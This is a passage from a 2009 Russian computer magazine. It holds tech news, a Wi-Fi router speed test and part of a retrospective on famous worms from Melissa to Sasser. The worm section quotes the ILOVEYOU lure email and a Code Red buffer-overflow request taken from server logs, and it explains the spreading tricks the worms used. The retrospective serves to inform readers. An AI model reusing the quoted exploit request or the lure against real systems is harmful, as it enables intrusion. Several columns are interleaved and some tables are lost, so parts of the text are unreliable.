наушников, к iPod shuffle ничего 

не подходит. Даже гарнитура 

от iPhone — и та будет бесполезна. 

Оказалось, что внутри 

плееров находится специальный 

идентификационный чип, 

и производителям аксессуаров 

придется либо заключать с 

Apple контракт и участвовать 

в программе «Made for iPod», 

либо же их устройства просто не 

будут работать с новым suffle. 

Так что, выбор наушников и 

аксессуаров для нового плеера 

вряд ли будет велик, а качество 

наушников «по умолчанию» у 

многих вызывает опасения. Зато 

в Apple очень гордятся тем, что 

iPod shuffle умеет говорить на 14 

языках (русского среди них нет). 

Это не шутка — за счет функции 

VoiceOver плеер может проговаривать 

название треков, имена 

исполнителей и заголовки плейлистов, 

которые научился поддерживать. 

Учитывая странный 

ход с наушниками и цветовой 

гаммой, это весьма слабое утешение. 

Мало кто станет, забавы 

ради, покупать говорящий плеер 

за $79. 

Рано или поздно все случается 

в первый раз — зафиксирован 

случай заражения троянской 

программой непосредственно 

самого банкомата, что ранее 

считалось слишком хлопотным 

делом, на грани невозможного. 

Конечно, использовать скиммеры, 

скрытые камеры и другие девайсы 

гораздо проще, чем внедряться в 

закрытую сеть, работающую под 

управлением нестандартных, 

специализированных ОС. Тем не 

менее, работник компании Sophos 

Ваня Швайцер решил проверить 

слухи, твердившие о зараженных 

банкоматах в России. Проверка 

базы данных компании ничего не 

дала, но Швайцер нашел в ней три 

относительно новых файла, которые 

вызывали у него подозрение. 

Проведя ручную проверку, он не 

поверил своим глазам, обнаружив 

самый настоящий троян, 

«заточенный» под банкоматы 

Diebold и их ПО. До конца троянец 

еще не расшифрован, но уже 

сейчас ясно, что он перехватывал 

данные с магнитной полосы карты 

и клавиатуры банкомата. Создание 

такой софтины явно не обошлось 

без программиста, хорошо знающего 

ПО Diebold Agilis. Засланный 

казачок? 

014 

XÀÊÅÐ 04 /124/ 09

meganews 

Новинки с приставкой Eee 

На уже упомянутой выставке 

CeBIT был представлен целый 

ряд новых моделей и устройств 

из серии Eee от компании Asus. 

Оригинальный Eee Keyboard 

PC, получивший первый приз 

на церемонии CeBIT-PreView 

Awards, — это функционал полноценного 

ПК в обличие клавиатуры 

с 5’’ сенсорной панелью. Просто 

подключаем Keyboard PC к 

любому телевизору или монитору 

по беспроводному интерфейсу, 

и полноценный вычислительно-развлекательный 

комплекс 

в нашем распоряжении! Eee PC 

T91 — планшетный компьютер с 

сенсорным экраном, диагональю 

8.9’’. При весе 0.96 кг он способен 

работать от одного заряда батареи 

в течение 5 часов, оснащен 

интерфейсами 802.11b/g/n, 

Bluetooth и 3G plus, а также GPS и 

ТВ-тюнером. Из других продуктов 

семейства Eee были представлены 

сенсорный моноблок Eee 

Top ET1602, работающий почти 

бесшумно; Eee Box PC B206 — 

самый компактный в мире ПК 

с поддержкой HD; автономный 

Skype-видеофон Eee Videophone; 

беспроводной игровой манипулятор 

Eee Stick и др. Подробнее 

почитать о последних достижениях 

прогресса можно на официальном 

сайте компании. 

47% ОПРОШЕННЫХ КОМПАНИЕЙ 

ADFUSION АМЕРИКАНЦЕВ ЧИТАЮТ 

РЕКЛАМНЫЙ СПАМ, ПРИХОДЯЩИЙ 

НА E-MAIL, И ПОКУПАЮТ 

РЕКЛАМИРУЕМЫЕ ТОВАРЫ. 

XÀÊÅÐ 03 /123/ 09 

015

ferrum 

ИГОРЬ ФЕДЮКИН 

Тест Draft N Wi-Fi роутеров 

Nовейшие технологии беспроводной связи 

Не так давно мы уже тестировали Draft N роутеры. Но даже за этот 

небольшой отрезок времени успело появиться немало интересных 

новинок. Мы попытались собрать самые горячие из них и в деталях 

исследовать все функциональные и скоростные характеристики. 

Отрадно, что все больше моделей WiFi-роутеров 

становятся полностью работоспособны в 

сетях российских провайдеров. И это касается 

не только появления новых моделей у вендоров, 

уже уделивших внимание проблеме, — но 

и расширения списка таких вендоров. Так, за 

последнее время компания TRENDnet доработала 

прошивки почти всех своих роутеров. 

Теперь они полноценно маршрутизируют два 

соединения на WAN-интерфейсе. Напомним, 

что необходимость в этом зачастую присутствует 

в сетях крупных провайдеров, которые 

для авторизации пользователей используют 

протоколы PPTP/L2TP или PPPoE. Для 

доступа к внутренним ресурсам провайдера 

не требуется ничего, кроме настроек TCP/IP. 

А вот линк в интернет «появляется» только 

после активации VPN-соединения. Многие 

роутеры после активации VPN-соединения 

«забывают» про внутреннюю сеть провайдера. 

К счастью, таких становится все меньше и 

меньше. 

МЕТОДИКА ТЕСТИРОВАНИЯ 

Для максимально объективной оценки скоростных 

возможностей роутеров были произведены 

следующие замеры: 

1. Пропускная способность NAT (скорость 

маршрутизации в случае выбора режима 

Static IP или Dynamic IP на WAN-интерфейсе). 

Как обычно, мы замеряли скорость NAT в трех 

направлениях: WANLAN (из интернета к 

пользователю или download), LANWAN (от 

пользователя в интернет или upload) и FDX (в 

обе стороны сразу). 

2. Пропускная способность PPTP. Этот протокол 

часто используется крупными интернет-провайдерами 

для авторизации своих клиентов. В этом 

случае на WAN-интерфейсе создается дополнительное 

VPN-соединение, которое загружает 

CPU роутера, снижая его производительность. 

Из всех вариантов (PPPoE, PPTP и L2TP) PPTP 

наиболее медленный; таким образом, мы наблюдаем 

производительность маршрутизации 

устройства в наиболее сложных условиях. 

3. Для оценки скорости Wi-Fi мы использовали 

адаптеры ASUS WL-100N, D-Link DWA- 

645, TRENDnet TEW-624UB. Каждый роутер 

тестировался с адаптером того же производителя. 

В нашем тесте стационарный компьютер 

подключался к роутеру проводом на 

скорости 1 Гбит/с. Трафик гонялся между 

ним и ноутбуком с WiFi-адаптером. Так мы 

получали пиковую скорость беспроводного 

соединения. Измерения проводились с 

разным удалением ноутбука с адаптером 

от точки доступа. В первом случае расстояние 

не превышало одного метра, во 

втором — точка доступа и ноутбук находились 

в разных помещениях, разделенных 

капитальной стеной, а удаление составляло 

10 метров. Использовалось шифрование 

WPA-PSK-TKIP. 

016 

XÀÊÅÐ 04 /124/ 09

ferrum 

ПРОПУСКНАЯ СПОСОБНОСТЬ PPTP СОЕДИНЕНИЯ 

Тестирование проводилось 

со следующими прошивками: 

ASUS WL-500W — 1.9.8.2 

ASUS RT-N15 — 1.0.1.7 

D-Link DIR-615 — 2.25 B09 

D-Link DIR-655 — 1.12 B04 

NETGEAR WNDR3300 — 1.0.26 

TRENDnet TEW-632BRP — 1.10 B08 

TRENDnet TEW-633GR — 1.0.30 

TRENDnet TEW-633GR 

TRENDnet TEW-632BRP 

D-Link DIR-655 


ASUS WL-500W 

ASUS RT-N15 

000 

0 20 40 60 80 100 120 

Мбит/с 

Гигабитные роутеры D-Link DIR-655 и TRENDnet TEW-633GR уходят в 

значительный отрыв 

fdx 

I w 

w I 

5700 руб. 

5500 руб. 

ASUS RT-N15 

Технические характеристики: 

Интерфейсы: 1xWAN (RJ-45) 10/100/1000 Мбит/сек, 4xLAN (RJ-45) 

10/100/1000 Мбит/сек 

Беспроводная точка доступа Wi-Fi: IEEE 802.11 b/g + Draft N (до 300 

Мбит/сек) 

Частотный диапазон: 2,4 - 2,5 ГГц 

Безопасность: WEP (до 128 бит), WPA/WPA-PSK, WPA2/WPA2-PSK 

(TKIP/AES/TKIP+AES), WPS 

Функции роутера: NAT/NAPT, DynDNS, Static Routing, DHCP 

Функции файрвола: SPI, Packet Filter, URL Filter, MAC Filter 

Дополнительно: WAN Bridging 

ASUS WL-500W 


Интерфейсы: 1xWAN (RJ-45) 10/100 Мбит/сек, 4xLAN (RJ-45) 10/100 

Мбит/сек 





(TKIP/AES/TKIP+AES) 

Функции роутера: NAT/NAPT, DynDNS, Static Routing, DHCP 

Функции файрвола: SPI, Packet Filter, URL Filter, MAC Filter 

Дополнительно: 2 USB 2.0 порта для подключения USB-драйвов, 

видеокамер и т.п. 

ASUS давно грозился представить новые модели Draft N роутеров и вот, 

наконец, мы можем их лицезреть. RT-N15 занимает роль флагмана в 

новом семействе маршрутизаторов ASUS. Как и подобает современному 

роутеру, все порты модели гигабитные. И если для WAN-интерфейса это 

не столь актуально, то в домашней сети однозначно пригодится (особенно 

для обладателей скоростных NAS и медиасерверов). Производитель 

также обращает внимание на опцию WAN-Bridging, которая будет 

полезна, если ты смотришь IPTV через приставку. Функция позволяет 

полностью зеркалировать трафик, приходящий с WAN-порта на любой 

порт коммутатора. Благодаря этому, можно снизить нагрузку на CPU 

роутера, избавив его от необходимости работать в качестве IGMP-proxy. 

Полезно и наличие функции WPS, которая призвана облегчить процесс 

настройки Wi-Fi неопытным пользователям. 

Что касается скорости PPTP, — у ASUS RT-N15 она на том же уровне, что и у 

предшественника (ASUS WL-500W) и составляет порядка 20 Мбит/сек. 

XÀÊÅÐ 04 /124/ 09 

ASUS WL-500W, без сомнений — самый знаменитый Draft N роутер. 

Своей славой он обязан предшественнику — роутеру ASUS WL-500GP. 

Поскольку все это семейство маршрутизаторов использует в основе 

open-source микрокод на базе ОС Linux, энтузиасты создали альтернативную 

прошивку. В ней был реализован весь необходимый функционал 

для работы в сетях российских провайдеров (в том числе и роутинг двух 

WAN-соединений). Так WL-500W стал первым Draft N роутером с необходимым 

функционалом. Сегодня почти все эти функции присутствуют 

и в фирменной прошивке от ASUS. Из дополнительных возможностей 

стоит отметить два USB 2.0 порта, к которым можно подключать флешки, 

принтеры и web-камеры. 

Не обошлось и без недостатков. Скорость маршрутизации PPTP-соединения 

составляет, в лучшем, около 20 Мбит/сек. Использование WL- 

500W в качестве NAS также сомнительно в виду низкой скорости, которая 

не превышает 2 Мб/сек — и на запись, и на чтение. 

017

ferrum 

СКОРОСТЬ WI-FI (1М, МАКСИМАЛЬНЫЙ РАЗМЕР ПАКЕТА) 

СКОРОСТЬ WI-FI (10М, МАКСИМАЛЬНЫЙ РАЗМЕР ПАКЕТА) 



ap-pc 

fdx 

pc-ap 



ap-pc 

fdx 

pc-ap 





ASUS WL-500W 

ASUS WL-500W 

ASUS RT-N15 

ASUS RT-N15 

000 

0 20 40 60 80 100 120 

Мбит/с 

Наилучшие показатели по скорости Wi-Fi показал роутер D-Link DIR- 

655, но неплохо выглядят и TRENDnet TEW-633GR, и модели от ASUS 

000 

0 10 20 30 40 50 60 70 80 

Мбит/с 

На удалении 10 метров вперед вырывается ASUS WL-500W, но топовые 

модели D-Link и TRENDnet отстают не сильно 









(TKIP/AES/TKIP+AES), WPS 

Функции роутера: NAT/NAPT, DynDNS, DHCP, Traffic Shaping 

Функции файрвола: SPI, Packet Filter, URL Filter, MAC Filter, Access 

Control 

Дополнительно: IPv6 Ready 




10/100/1000 Мбит/сек 





(TKIP/AES), WPS 

Функции роутера: NAT/NAPT, DynDNS, DHCP, Static Routing, QoS Engine 

Функции файрвола: SPI, URL Filter, IP/MAC Filter, Access Control 

Дополнительно: нет 

2800 руб. 

5100 руб. 

Сравнительно новый роутер от компании D-Link, который призван занять 

бюджетную нишу Draft N роутеров. Фирменной изюминкой модели 

стала поддержка протокольного стека IPv6. Учитывая, что одно из препятствий 

на пути с IPv4 на IPv6 — это отсутствие поддержки со стороны 

домашнего оборудования, нельзя не похвалить D-Link за проявленную 

инициативу! По пропускной способности WAN-интерфейса D-Link 

DIR-615 уступает только гигабитным моделям роутеров. Так же, как и у 

старшей модели (D-Link DIR-655), тут реализована работа с двумя соединениями 

на WAN-интерфейсе — роутер умеет корректно и одновременно 

маршрутизировать VPN-соединение и внутреннюю сеть провайдера. А 

благодаря наличию функции IGMP Proxy, можно просматривать multicast 

IPTV потоки, находясь за роутером. 

Один из немногих недостатков роутера — невозможность задать адрес 

L2TP-сервера в виде имени. 

018 

Роутер уже не раз появлялся в наших тестах, поскольку он один из 

лучших в своем классе. С момента появления прошивки 1.12WW Build 

04 его обладатели получили полноценную работу двух WAN-соединений. 

Помимо этого, D-Link DIR-655 показывает отменную производительность. 

Пропускная способность в режиме NAT составляет около 

250 Мбит/сек, а при использовании протокола PPTP — 90-100 Мбит/ 

сек. Скорость Wi-Fi у этой модели также хороша. При минимальном 

удалении ноутбука от роутера составляет порядка 90 Мбит/сек, а при 

расстоянии в 10 метров — 60 Мбит/сек. Безусловно, роутер умеет работать 

в качестве IGMP-proxy, так что смотреть multicast-потоки IPTV не 

составит никакого труда. 

С тестируемой версией прошивки роутер не восстанавливает PPTPсессию 

после нескольких повторных дисконнектов. В настройках 

L2TP-соединения нет возможности задать адрес сервера в виде 

имени. 

XÀÊÅÐ 04 /124/ 09

ferrum 

СКОРОСТЬ WI-FI (1М, МИНИМАЛЬНЫЙ РАЗМЕР ПАКЕТА) 

СКОРОСТЬ WI-FI (10М, МИНИМАЛЬНЫЙ РАЗМЕР ПАКЕТА) 



ap-pc 

fdx 

pc-ap 



ap-pc 

fdx 

pc-ap 





ASUS WL-500W 

ASUS WL-500W 

ASUS RT-N15 

ASUS RT-N15 

000 

0 0.2 0.4 0.6 0.8 1 1.2 1.4 

Мбит/с 

При минимальном размере пакета лидерами вновь являются D-Link 

DIR-655 и TRENDnet TEW-633GR, оставляя соперников далеко позади 

000 

0 0.2 0.4 0.6 0.8 1 1.2 1.4 

Мбит/с 

И даже увеличение дистанции до 10 метров не меняет ситуацию — вновь 

уверенно лидируют D-Link DIR-655 и TRENDnet TEW-633GR 

2900 руб. 

6000 руб. 










Функции роутера: NAT/NAPT, DynDNS, DHCP, Static Routing 

Функции файрвола: SPI, Packet Filtering, Domain/URL Filtering, MAC 

Filtering 

Дополнительно: WPS 




10/100/1000 Мбит/сек 






Функции роутера: NAT/NAPT, DynDNS, DHCP, Static Routing, Traffic 

Shaping 

Функции файрвола: SPI, Packet Filtering, Domain/URL Filtering, MAC 

Filtering 

Дополнительно: StreamEngine, WPS 

В продуктовой линейке TRENDnet модель TEW-632BRP занимает роль 

бюджетного роутера, а в нашем тесте она выступает главным конкурентом 

D-Link DIR-615. Как уже говорилось, компания TRENDnet обновила 

прошивку для этого маршрутизатора, реализовав возможность 

работы с двумя соединениями на WAN-интерфейсе. Таким образом, не 

придется отключаться от интернета, чтобы воспользоваться внутренними 

ресурсами провайдера. Роутер неплохо себя показал и в плане 

скорости NAT — при одновременной передаче в оба направления 

(WANLAN и LANWAN) суммарная пропускная способность перевалила 

за 100 Мбит/сек. Наличие функции WPS определенно пригодится 

новичкам, избавив от изучения мануала на предмет нюансов 

настройки WiFi-сети. Нажал кнопку WPS или ввел PIN-код в окошке 

web-браузера — и готово. 

Скорость PPTP-соединения подкачала — всего 10 Мбит/сек. Этого 

будет достаточна только для обладателей «безлимитных» флэт-рейтов. 

TEW-633GR — одна из самых навороченных моделей в линейке Draft N 

роутеров TRENDnet. Этот роутер оснащен гигабитным свитчем (включая 

WAN-интерфейс) и мощным процессором, который позволяет достигать 

рекордной скорости NAT (чуть менее 300 Мбит/сек). Впрочем, пока провайдеры 

не подключают пользователей на скорости более 100 Мбит/сек. 

А вот гигабитные порты свитча пригодятся для обладателей скоростного 

NAS-сервера. Пропускная способность PPTP-соединения — также на 

очень высоком уровне. По этому параметру TRENDnet TEW-633GR уступает 

лишь D-Link DIR-655. Благодаря функции WPS, настройка WiFi-сети 

упрощена до предела и не вызовет проблем даже у новичков. 

На момент тестирования не было прошивки, реализующей корректную 

работу двух WAN-соединений. Компания TRENDnet обещает выпустить 

таковую в самое ближайшее время, так что ждем. 

ВЫВОДЫ 

Как и на всю импортную продукцию, цены на роутеры в последнее 

время заметно поднялись. Наиболее привлекательные 

по цене модели, пару-тройку месяцев назад стоившие меньше 

2000 рублей, сейчас уже продают за 3000. Но выбор так или 

иначе делать приходится. «Лучшую покупку» мы отдаем модели 

TRENDnet TEW-632BRP — с точки зрения цена/качество она 

выглядит сильнее остальных. «Выбор редакции» достался 

D-Link DIR-655, который пока остается лучшим Wi-Fi Draft N 

роутером среди всех протестированных нами моделей. z 

XÀÊÅÐ 04 /124/ 09 

019

pc_zone 

Code red 

3 

СТЕПАН ИЛЬИН 

/ STEP@GAMELAND. RU/ 

Loveletter 

2 

Nimda 

4 

Melissa 

1 

Sasser 

6 

Slammer 

5 

J3 

ЗЛО-ВИРУСОВ 

Storm 

9 

Mebroot 

Warezov 

8 

10 

7 

Sony rootkit 

САМАЯ НАШУМЕВШАЯ МАЛВАРЬ ЗА ПОСЛЕДНИЕ 10 ЛЕТ 

Каждый день — новая зараза. С таким разнообразием всевозможной 

живности появление новой малвари просто перестаешь замечать. 

И все-таки, были эпидемии, которые не прошли незамечено. 

Мы решили вспомнить последние 10 лет и выбрать за каждый год наиболее 

запомнившуюся заразу. 

020 

XÀÊÅÐ 04 /124/ 09

pc_zone 

Melissa 

Loveletter 

ВЕСЬ КОД MELISSA УМЕЩАЕТСЯ В 100 СТРОЧКАХ 

А ВОТ ТАК ВЫГЛЯДЕЛО ПИСЬМО ILOVEYOU 

1999 2000 

Melissa Едва ли программист из 

Нью-Джерси задумывался 

о том, чтобы собрать ботнет из миллионов 

машин и использовать его для рассылки спама. 

Вряд ли он мог представить последствия, создавая 

своего, казалось бы, безобидного червя 

Melissa. Ведь даже распространение тот начинал 

не с инета — впервые червь был обнаружен 

26 марта в конференции alt.sex внутри Usenet 

— в то время еще популярной сети для общения 

и обмена файлами. К сообщению был приложен 

файл List.DOC, содержащий пароли на 80 

порнушных сайтов: позарившись на «клубничку», 

файлик с радостью открыли многие. 

А дальше пошло-поехало: червь тут же начал 

распространение, отправляя себя по 50 первым 

контрактам из записной книжки пользователя. 

Это был первый успешный червь, распространяемый 

через e-mail. 

Loveletter В следующем году — 

новая почтовая эпидемия, 

вызванная вирусом Love Letter (или Love 

Bug). Письма, содержащие незамысловатое 

ILOVEYOU в строке темы, посыпались на ничего 

не подозревавших пользователей градом. 

И все было бы замечательно, если бы к письму 

не был приложен скриптик на Visual Basic 

Script, замаскированный под текстовый файл. 

The Subject: ILOVEYOU 

Message body: kindly check the 

attached LOVELETTER coming from me. 

Attached file: LOVE-LETTER-FOR- 

YOU.TXT.vbs 

На лицо отличный пример социальной инженерии 

и прием двойного расширения, — что 

помогло скрыть подлинную природу файла. По 

умолчанию Винда не показывала второе, настоящее, 

расширение файла, поэтому принять 

аттач за обычный текстовик действительно 

было проще простого. Ну а коль пользователь 

файл запустил, можно делать свое дело. 

Написанная с использованием механизма 

Windows Scripting Host, малварь честно 

рассылает копии тела по всем адресам из 

адресной книги почтовой программы MS 

Outlook, после чего приступает к деструктивной 

части, закачивая и устанавливая в 

системе троя. Путь до исполняемого файла 

прописывался как домашняя страница 

в параметрах Internet Explorer. Это обеспечивало 

его автоматическую загрузку, а 

запуск в системе гарантировал специально 

созданный ключ в реестре. Далее домашняя 

страница возвращалась на свое место — и 

ушастый пользователь даже не замечал изменений. 

Тем временем, WIN-BUGSFIX.EXE 

или Microsoftv25.exe честно отправлял автору 

отснифанные пароли. 

Трик с использованием двойного расширения 

автор заюзал не только в письмах. Для файлов 

целого ряда расширений, червь создавал 

свои копии, добавляя к их названию расширение 

.vbs. Если в папке был файл rulez.mp3, то 

тут же создавался rulez.mp3.vbs с телом червя 

— и так повсюду. 

Когда Melissa открывает зараженный документ 

MS Word 97/2000, запускается специальный 

макрос, который рассылает копии червя в 

сообщениях электронной почты при помощи 

обычного Outlook’а. Для этого червь юзает возможность 

Visual Basic активизировать другие 

приложения MS Windows и использовать их 

процедуры. Вирус вызывает MS Outlook, считывает 

из адресной книги первые 50 email’ов 

и посылает по этим адресам сообщения. 

Написав в мессаге текст аля «Вот документ, о 

котором ты меня спрашивал», червь приаттачивал 

к письму текущий открытый документ 

пользователя, предварительно заражая его. 

Последнее, кстати, повлекло за собой массу 

курьезных ситуаций и, в ряде случаев — утечки 

конфиденциальной информации. 

В 1999 году пользователи даже не задумывались 

о том, что в аттаче от известного им адресата 

может быть какая-то зараза, и активно 

открывали вложения. 

Стремительное распространение вируса 

серьезно нагрузило почтовые серверы — им 

пришлось обрабатывать на несколько порядков 

больше отправлений, чем обычно. Тысячи 

машин по всему миру не выдержали нагрузки 

и вышли из строя. К 27 марта распространение 

вируса приняло характер эпидемии; 29 марта 

он проник уже на компьютеры всех стран 

мира, подключенных к Сети, в том числе и на 

российские. 

Найденному силами ФБР Девиду Смиту, 

который и написал те три десятка строк кода на 

VB, грозили 10 лет тюрьмы, но парень «легко 

отделался», получив 20 месяцев заключения 

и штраф в $5000. Однако исходники червя 

еще долго мусолили хакеры, плодя различные 

модификации Melissa. 

В основе другого способа распространения, 

который так же давал плоды, лежали скрипты 

для mIRC — самой распространенной 

программы для бешено популярных тогда 

IRC-чатов. Пользователям чата автоматически 

передавалась HTML-ка, предлагающая 

закачать некий ActiveX-элемент. Что находилось 

внутри, объяснять не надо, но поверь на 

слово: посмотреть, что прислал им хороший 

приятель, соглашались очень многие. 

Первый случай активности Love Letter был зафиксирован 

4 мая 2000 г., а уже через сутки им 

были частично или полностью поражены сети 

ЦРУ, NASA, Министерства энергетики, конгресса 

США, Пентагона, британской палаты 

общин и еще множества организаций. Ущерб, 

нанесенный червем в первые дни активности, 

был оценен в $5 миллионов. Офигительно? 

Виновника этого безобразия помог найти оставленный 

им автограф: «barok -loveletter(vbe) 

 by: spyder / ispyder@mail. 

com / Manila,Philippines». Но в виду отсутствия 

местных законов за подобные преступления, 

никакой ответственности он не понес. 

XÀÊÅÐ 04 /124/ 09 

021

pc_zone 

CODE RED ДЕФЕЙСИЛ СИСТЕМЫ С АНГЛИЙСКОЙ ЛОКАЛЬЮ 

СЕТЕВАЯ АКТИВНОСТЬ SLAMMER’А 

Code Red 

Slammer 

2001 

Code Red Из-за этого червя сайту 

Белого дома США в 2002 

году пришлось поменять IP-адрес :). Стартовавшего 

13 июля 2001 года, Code Red интересовали 

виндовые машины с запущенным вебдемоном 

IIS на борту и включенной системой 

индексирования. О существовании критической 

уязвимости, приводящей к переполнению 

буфера, в Microsoft знали задолго до появления 

вируса, а за месяц до эпидемии была опубликована 

заплатка. Впрочем, это не помешало 

запущенному 13 июля червю заразить за 6 

следующих дней более 350 тысяч машин. 

Брешь в ISS позволяла легко выполнять на 

сервере удаленный код. Разработчики Code 

Red не сильно заморачивались и приделали 

эксплоит к простейшему сканеру, который 

работал «в лоб». Во время сканирования Code 

Red не проверял наличие IIS на новом компьютере-жертве, 

а тупо отправлял специально 

сформированные HTTP-запросы на сгенерированные 

случайно IP-адреса в надежде, что 

где-то на 80-порту окажется вожделенный IIS. 

Море запросов— огромный объем трафика. 

В итоге, оборудование попросту стало задыхаться 

от мусорных GET-запросов, которые 

генерировали ноды по всему мира. В логах 

Apache, на который, естественно, уязвимость 

IIS не распространялась, можно было обнаружить 

подобные строки: 

GET /default.ida?NNNNNNNNNNNNNNNNNN 

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 

NNNNNNNNNNNNNNNNNNNNNNN%u9090%u685 

8%ucbd3%u7801%u9090%u6858%ucbd3%u7 

801%u9090%u6858%ucbd3%u7801%u9090% 

u9090%u8190%u00c3%u0003%u8b00%u531 

b%u53ff%u0078%u0000%u00=a HTTP/1.0 

В процессе работы Code Red не использовал 

никаких временных или постоянных файлов. 

Червь уникален: он существовал либо в 

системной памяти зараженных компьютеров, 

либо в виде TCP/IP-пакета при пересылке на 

удаленные машины. Но наличие заразы на 

сервере обнаруживалось без всякого антивируса. 

Поскольку в памяти компьютера могли 

существовать сразу сотни активных процессов 

Code Red, то тормоза и лаги были неизбежны. 

Червь заменял содержимое страниц на 

зараженных серверах на сообщение: «HELLO! 

Welcome to http://www.worm.com! Hacked By 

Chinese!», но был избирателен и дефейсил 

только те системы, где в качестве основного 

языка был установлен английский.Через некорое 

время, правда, дефейс снимался автоматически: 

видимо, разработчики не хотели раньше 

времени терять драгоценную ноду. 

Между 20 и 28 числами месяца тело червя 

должно было начать DoS-атаку на несколько 

IP-адресов, один из которых принадлежал 

американскому Белому дому. 

В августе этого же года начал распространяться 

новый червь Code Red II, код которого, несмотря 

на схожее название, был создан заново 

и предоставлял владельцам полный контроль 

над зараженными машинами, копируя файл 

cmd.exe в каталог \inetpub\scripts\ ISS-сервера. 

В отличие от оригинального Code Red, клон 

старался атаковать хосты в той же подсети и 

не допускал одновременного запуска себя на 

одной системе. 

2002 

Nimda Запустившегося в 

сентябре 2001 года червя 

ну никак не могли не связать с деятельностью 

Алькайды, заодно рассказывая о мощных технологиях, 

применяемых в новой заразе. Но если 

присказки о терроризме были выдумкой журналистов, 

то очевидная продвинутость нового 

червя была на лицо. Фишка Nimda заключалась 

сразу в нескольких каналах распространения, 

благодаря которым ему удалось в считанные 

минуты распространиться по Сети. Разберемся 

по порядку. 

1. Наибольший пробив был получен за счет 

эксплоита, который использовал уязвимость в 

Internet Explore’е, позволяющую автоматически 

запускать приаттаченный к письму файл. Прикрепленный 

к письму README.EXE (написаный, 

кстати, на С++) беспрепятственно запускался 

на машине при простом открытия письма, и 

комфортно начинал свое распространение. 

Причем, для поиска новых адресатов вирус 

кропотливо сканировал текстовые документы на 

жестком диске, а также запрашивал с помощью 

специальной MAPI-функции список адресатов с 

сервера Microsoft Exchange. 

2. Другой способ распространения — расшаренные 

ресурсы в локалке. После сканирования 

всех доступных шар Nimda создавал там файлы 

с почтовыми сообщениями, имеющие расширение 

.EML и .NWS.Открытие таких файлов происходит 

в почтовой программе, что автоматически 

влекло за собой заражение, как если бы письмо 

просто пришло по почте. 

3. Не могли забыть создатели и про дырявый IIS, 

уязвимость в котором уже использовали другие 

черви. Поэтому Nimda довольно эффективно 

пробивал майкросовский веб-демон с помощью 

уязвимости directory traversal. В случае заражения 

веб-сервера на нем случайным образом 

выбирались странички, откуда начиналась 

загрузка вируса посетителям. 

4. И еще интересный ход — Nimda не стеснялся 

и активно использовал для распространения 

бекдоры, оставленные в системах червями Code 

Red II и sadmind/IIS. 

Добавим, что Nimda имел опасный побочный 

эффект, который мог допустить утечку конфиденциальной 

информации с зараженных компьютеров. 

Червь добавлял пользователя под именем 

«Guest» в группу пользователей «Администраторы». 

Таким образом, обычные гости получали 

полный доступ к ресурсам компьютера. Более 

того, все локальные диски открывались через 

шары для полного доступа. 

Автор этого вируса официально не найден, но 

в теле червя содержится строка, указывающая, 

что создатель из Китая: «Concept Virus(CV) V.5, 

Copyright(C)2001 R.P.China» 

022 

XÀÊÅÐ 04 /124/ 09

pc_zone 

DESKTOP 

COMPUTER 

email с 

аттачем 

Sasser 

email c 

аттачем 

DESKTOP 

COMPUTER 

Использовование 

уязвимостей в IIS 

и бэкдоров Code Red 

Малварь код на веб-страницах 

веб 

страницы 

WEB 

SERVER 

Доступ 

к зараженному 

файлу на другом 

компе 

Использовование 

уязвимостей в IIS 

и бэкдоров Code Red 

WEB 

SERVER 

DESKTOP 

COMPUTER 

OR FILE 

SERVER 

РАЗНЫЕ СПОСОБЫ ЗАРАЖЕНИЯ ЧЕРВЯ NIMDA 

Nimda 

ОШИБКА СИСТЕМЫ ПОСЛЕ ЗАРАЖЕНИЯ 

SASSER’ОМ 

2003 2004 

Slammer Незадачливые жители 

стран Северной Америки 

были сильно удивлены, когда 25 января 

многие банкоматы попросту перестали работать. 

Во всем мире со сбоями работали службы 

по заказу и резервированию авиабилетов, 

многие сервисы вообще не были доступны. 

Но набивший оскомину финансовый кризис 

тут вовсе не причем — это лишь всплеск активности 

червя Slammer. Активность впервые 

замечена в 12:30 по среднеатлантическому 

времени, а к 12:33 количество зараженных 

машин удваивалось каждые 8.5 секунд. 

В основе червя лежала уязвимость в Microsoft 

SQL Server, концепция которой была представлена 

David Litchfield на конференции BlackHat. 

Отправляя на 1434 скомпрометированный 

Sasser Уж что-что, а окошко 

System Shutdown, инициированное 

NT AUTHORITY\SYSTEM с обратным 

отсчетом и сообщением о принудительной 

перезагрузке компьютера видел почти каждый 

— годом ранее, во время эпидемии Blaster’а, 

либо же в 2004, когда стал бушевать во многом 

похожий на него Sasser. Принципиальная 

разница червей в том, что они используют критические 

уязвимости в разных службах. Для 

размножения Sasser использует баг переполнения 

буфера в службе Local Security Authority 

Subsystem Service (LSAS) — отсюда и название 

червя. Написанное на С++ тело Sasser в первоначальной 

версии открывает 128 параллельных 

потоков, и, используя специальный 

пакет, вирус мог выполнить на удаленной 

машине произвольный код и, в свою очередь, 

продолжить распространение. По различным 

отчетам сообщается, что вирусу удалось заразить 

75.000 машин за каких-то десять минут, 

— но как? Уязвимый модуль IIS, позволяющий 

приложениям автоматически обращаться к 

нужной базе данных, принимал запросы как 

раз по UDP, а тело вируса, составляющее всего 

376 байт, отлично помещалось в один единственный 

UDP-пакет. В результате Slammer 

не использовал тормозной TCP, требующий 

постоянных квитков-подтверждений, а рассылал 

себя по ненадежному UDP со скоростью 

несколько десятков запросов в секунду! 

Несмотря на то, что патч для уязвимости был 

выпущен за 6 месяцев до эпидемии, а вирус 

никак не проявлял себя на зараженной машине, 

последствия от Slammer’а были колоссальными. 

Роутеры и маршрутизаторы на магистралях 

были настолько перегружены трафиком, 

что лавинообразно выбивали другу друга в 

конце концов отключив некоторые бэкбоны. 

Южная Корея была полностью отрублена от 

инета и находилась в таком состоянии почти 

24 часа. Только представь: никакого интернета 

и мобильной связи с внешним миром для 27 

миллионов человек. Забавно, что многие жертвы 

даже не знали, что на их машине установлена 

такая специфическая вещь, как SQL. 

алгоритм по генерации IP-адресов, пытается 

найти системы с незащищенным 445 портом 

и уязвимым сервисом. Сплоит работал на 

«ура», правда, приводил к ошибке на системе 

пользователя. Sasser открывал на 9997 порту 

шелл, через который далее и заливалось все 

необходимое. Само тело червя без лишнего 

геморроя просто передавалось по протоколу 

через FTP, причем сервер также открывался 

на зараженных компьютерах на 5554 порту. 

Как часто бывает, шелл-код сплоита отличается 

от системы к системе, поэтому Sasser 

предварительно проверял версии удаленной 

системы, чтобы выбрать правильный набор 

параметров для атаки. 

Оригинальная версия червя Sasser распространялась 

достаточно медленно, но через 

несколько дней в Сети были выпущены модификации, 

распространяющиеся гораздо быстрее. 

К этому моменту число зараженных машин 

